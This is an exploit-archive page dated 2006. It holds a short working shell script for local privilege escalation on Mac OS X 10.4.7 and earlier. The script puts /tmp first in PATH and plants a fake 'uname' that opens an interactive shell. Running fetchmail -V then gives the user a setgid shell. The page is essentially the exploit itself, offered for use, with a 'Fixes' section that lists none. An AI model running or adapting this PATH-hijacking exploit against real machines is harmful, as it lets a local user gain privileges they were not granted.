Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit

2006-08-01 00:00:00

#!/bin/sh
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Previously undisclosed local fetchmail issue. This takes setgid=6
#
# http://docs.info.apple.com/article.html?artnum=106704

export PATH=/tmp:$PATH
echo /bin/sh -i > /tmp/uname
chmod +x /tmp/uname
/usr/bin/fetchmail -V

#

Fixes

No fixes

In order to submit a new fix you need to be registered.